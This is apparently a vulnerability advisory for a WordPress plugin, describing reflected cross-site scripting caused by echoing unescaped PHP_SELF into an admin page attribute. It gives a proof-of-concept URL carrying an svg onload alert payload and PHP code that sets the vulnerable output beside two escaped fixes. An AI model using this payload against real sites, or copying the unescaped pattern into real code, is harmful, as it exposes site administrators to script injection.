The plugin does not sanitise and escape the $_SERVER['PHP_SELF'] variable before outputting it back in an attribute in an admin page, leading to Reflected Cross-Site Scripting.
https://example.com/wp-admin/options-general.php/%22%3E%3Csvg/onload=alert(/xss/)%3E?page=ais
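The following is an added example, not the plugin's code: it shows the unescaped attribute output described above next to two corrected forms, using the request above as constructed input. The `<form action>` context and all function names are assumptions; plain PHP `htmlspecialchars()` stands in for the WordPress escaping helpers so the script runs outside WordPress.

```php
<?php
// Constructed sample: what PHP places in $_SERVER['PHP_SELF'] for the request
// above (script path plus the URL-decoded trailing path info).
$php_self = '/wp-admin/options-general.php/"><svg/onload=alert(/xss/)>';

// Pattern the advisory describes: the raw value lands inside a quoted attribute.
// The <form action> context is an assumption; the page only says "an attribute".
function render_unescaped(string $self): string
{
    return '<form method="post" action="' . $self . '?page=ais">';
}

// Fix 1: escape for the attribute context at output time.
// Inside WordPress, esc_url() or esc_attr() fills this role.
function render_escaped(string $self): string
{
    $action = htmlspecialchars($self . '?page=ais', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form method="post" action="' . $action . '">';
}

// Fix 2: build the URL from constants so no request-derived path is echoed.
// Inside WordPress: esc_url( admin_url( 'options-general.php?page=ais' ) ).
function render_fixed_target(): string
{
    $action = '/wp-admin/options-general.php?page=ais';
    return '<form method="post" action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
}

// Regression check: correct output holds exactly one tag, the <form> itself.
function tag_count(string $html): int
{
    return substr_count($html, '<');
}

foreach ([
    'unescaped' => render_unescaped($php_self),
    'escaped'   => render_escaped($php_self),
    'fixed'     => render_fixed_target(),
] as $label => $html) {
    printf("%-9s tags=%d  %s\n", $label, tag_count($html), $html);
}
```

A tag count above one for the unescaped variant means the path info closed the attribute and opened a new element; both corrected variants keep the count at one.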
p7e4
p7e4
Yes
2022-04-19
2022-04-19
2022-04-20